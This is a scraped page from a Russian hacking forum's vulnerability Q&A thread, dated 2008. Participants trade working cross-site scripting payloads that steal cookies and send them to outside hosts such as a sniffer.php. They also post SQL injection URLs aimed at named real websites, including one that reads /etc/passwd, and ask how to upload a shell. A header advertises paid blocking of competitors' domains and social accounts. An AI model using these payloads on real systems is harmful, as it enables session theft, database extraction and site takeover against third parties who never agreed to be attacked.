УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 371 из 1393

371

Опции темы

Поиск в этой теме

Опции просмотра

#3701

15.11.2008, 15:32

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Отправить сообщение для -m0rgan- с помощью ICQ

Я тож в хсс не особо шарю....но там вродь нада составить скрипт который перекидует выполнять то что те нужно и вставить его в уязвимое поле...
P.S.:Если чтот не так написал просьба сильно не пинать...)

#3702

15.11.2008, 15:35

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

Цитата:

Сообщение от S0ulVortex

я в хсс чайник пока полный. Вот есть пассивная хсс вот я щелкаю по ссылке у меня доходит до странички с хсс а можно сделать так чтобы он после поподания на эту страничку переходил на другую например показывал какую нибудь картинку.

да.
js примерно следующего содержания
<script>
document.location.href="http://yandex.ru";
</script>
оно тебя перенаправит сам понимаешь куда))

#3703

15.11.2008, 15:46

o3,14um

Участник форума

Регистрация: 16.11.2006

Сообщений: 230

Провел на форуме:
599789

Репутация: 227

В ифрейм вставь ссылку со своей КСС - и всё бут нормально. ЕСли хочешь, ниже редиррект ещё припиши

#3704

15.11.2008, 15:55

S0ulVortex

Участник форума

Регистрация: 18.11.2007

Сообщений: 184

Провел на форуме:
1686744

Репутация: 246

Отправить сообщение для S0ulVortex с помощью ICQ

что не получается.У меня такого плана index js
в индексе пишу так
<script>document.location.href="ТУТ у меня хсс "</script>
а в js
img = new Image(); img.src = "http://na-s.ru/images/S0ulVortex_1.gif?"+document.cookie;
Я эту систему взял из видео где показывают хсс yandex

Может у кого есть другая система похожая на эту только чтобы после того как куки крадет кидала на какуюнють картинку или сайт

Последний раз редактировалось S0ulVortex; 15.11.2008 в 16:04..

#3705

15.11.2008, 16:11

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

код чтобы перенаправить на сниффер + кук
http://site.ru/index.php?xss='><script>document.location.href='yo ur_site/sniffer.php?cookie='+document.cookie;</script>

#3706

15.11.2008, 17:12

Parti

Новичок

Регистрация: 07.10.2007

Сообщений: 4

Провел на форуме:
32389

Репутация: 1

Добрый день

Как реализовать атаку SQL Injection в среде Interbase (Firebird)?

Код:

Warning: ibase_query(): Dynamic SQL Error SQL error code = -104 Token unknown - line 1, char 78 UNION in Firebird.php

Поддерживает ли Interbase установку UNION?

Был ли кого у опыт проведения атаки используя данную технологию?

Спасибо.

Последний раз редактировалось Parti; 15.11.2008 в 17:16..

#3707

15.11.2008, 19:57

truelamer

Участник форума

Регистрация: 06.11.2007

Сообщений: 143

Провел на форуме:
350782

Репутация: 81

http://www.nkzu.kz/new1/site_news.asp?id=123'

Microsoft JET Database Engine error '80040e14'

говорят не инжектится, но мне давным давно кто-то показал что таки извлеч инфу можно. Извлекали из табля news. Есть идеи как эту скулу раскрутить?

Последний раз редактировалось truelamer; 15.11.2008 в 20:06..

#3708

15.11.2008, 20:37

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

Parti, да в ibase можно объединять запросы оператором union; sql-inj хз смотря как построен запрос - попробуй perl-утилиту isr-sqlget
truelamer, _http://forum.antichat.ru/thread50550.html

#3709

15.11.2008, 20:40

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Есть сайт, на нём бажный скрипт

script.php?id=-1+union+select+1,2,3,4,5,load_file(0x2F6574632F706 173737764),7,8,9,10/*

выдаёт содержимое etc\passwd ..

как мне шелл залить теперь?

#3710

15.11.2008, 21:05

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от truelamer

говорят не инжектится

Кто говорит? Просто это Access, и всё немного подругому, если хочешь подбирай таблицы и поля:

http://www.nkzu.kz/new1/site_news.asp?id=240+union+select+1,2,3,4,5,6+from +tblnews

попугай
Вчера расписывал ответ на такой-же вопрос:
https://forum.antichat.ru/showpost.php?p=942609&postcount=34

Страница 371 из 1393

371

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 11 (пользователей: 0 , гостей: 11)

Быстрый переход